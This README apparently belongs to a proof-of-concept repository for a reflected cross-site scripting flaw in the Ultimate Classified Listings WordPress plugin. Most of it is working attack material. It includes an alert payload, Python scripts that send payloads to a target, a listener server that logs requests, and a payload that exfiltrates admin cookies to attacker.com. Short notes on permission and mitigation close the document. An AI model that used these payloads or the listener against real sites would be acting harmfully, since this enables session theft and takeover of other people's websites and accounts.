This repository contains Proof of Concept (PoC) scripts for various vulnerabilities discovered in different WordPress plugins. These scripts demonstrate how attackers can exploit these vulnerabilities to perform malicious actions.
-
Reflected Cross-Site Scripting (XSS) in Ultimate Classified Listings Plugin
- A vulnerability in the Ultimate Classified Listings WordPress plugin before version 1.4 allows attackers to execute arbitrary JavaScript by injecting malicious scripts through unsanitized parameters.
-
Stealing Cookies Using XSS
- Demonstrates how an attacker can exploit the reflected XSS vulnerability to steal cookies of high-privilege users, such as admins, by sending the cookies to a malicious server.
This PoC demonstrates how to exploit the reflected XSS vulnerability in the Ultimate Classified Listings plugin.
-
Identify the Vulnerable Parameter:
- Assume the vulnerable parameter is
searchin the URLhttp://example.com/classifieds.
- Assume the vulnerable parameter is
-
Craft a Malicious URL:
- The malicious URL can include a payload to execute an alert dialog:
http://example.com/classifieds?search=<script>alert('XSS')</script>
- The malicious URL can include a payload to execute an alert dialog:
-
Run the PoC Script:
- Save the following script as
xss_poc.pyand run it.
import requests # Configuration target_url = "http://example.com/classifieds" # Change this to the target site's URL payload = "<script>alert('XSS')</script>" # XSS payload def trigger_xss(): # Construct the malicious URL malicious_url = f"{target_url}?search={payload}" # Send a GET request to the malicious URL response = requests.get(malicious_url) # Check if the payload is reflected in the response if payload in response.text: print("[+] XSS payload reflected in the response.") print("[+] Malicious URL:", malicious_url) else: print("[-] XSS payload not reflected in the response.") if __name__ == "__main__": trigger_xss()
- Save the following script as
This PoC demonstrates how an attacker can exploit the reflected XSS vulnerability to steal cookies from high-privilege users.
-
Setup a Malicious Server:
- Save the following script as
malicious_server.pyand run it to start a server that logs incoming requests (including cookies).
from http.server import BaseHTTPRequestHandler, HTTPServer import logging class RequestHandler(BaseHTTPRequestHandler): def do_GET(self): logging.info(f"Received request: {self.headers}") self.send_response(200) self.end_headers() def run(server_class=HTTPServer, handler_class=RequestHandler, port=8080): logging.basicConfig(filename='server.log', level=logging.INFO) server_address = ('', port) httpd = server_class(server_address, handler_class) logging.info(f'Starting server on port {port}...') httpd.serve_forever() if __name__ == "__main__": run()
- Save the following script as
-
Craft a Payload to Steal Cookies:
- Create a payload that sends the admin's cookies to the malicious server:
http://example.com/classifieds?search=<script>new Image().src='http://attacker.com:8080?cookie='+document.cookie;</script>
- Create a payload that sends the admin's cookies to the malicious server:
-
Run the PoC Script:
- Save the following script as
steal_cookies_poc.pyand run it.
import requests # Configuration target_url = "http://example.com/classifieds" # Change this to the target site's URL attacker_server = "http://attacker.com:8080" # Change this to your malicious server's URL payload = f"<script>new Image().src='{attacker_server}?cookie='+document.cookie;</script>" def trigger_xss(): # Construct the malicious URL malicious_url = f"{target_url}?search={payload}" # Send a GET request to the malicious URL response = requests.get(malicious_url) # Check if the payload is reflected in the response if payload in response.text: print("[+] XSS payload reflected in the response.") print("[+] Malicious URL:", malicious_url) else: print("[-] XSS payload not reflected in the response.") if __name__ == "__main__": trigger_xss()
- Save the following script as
- Permissions: Ensure you have explicit permission to test these vulnerabilities on the target site. Unauthorized access is illegal and unethical.
- Testing Environment: Perform these tests in a controlled environment to avoid impacting production systems.
- Mitigation: Update the Ultimate Classified Listings plugin to version 1.4 or later. Always sanitize and escape user inputs before including them in the output.
These PoCs demonstrate how an attacker could exploit vulnerabilities in WordPress plugins to perform malicious actions. Always keep your software up-to-date and follow security best practices to prevent such vulnerabilities.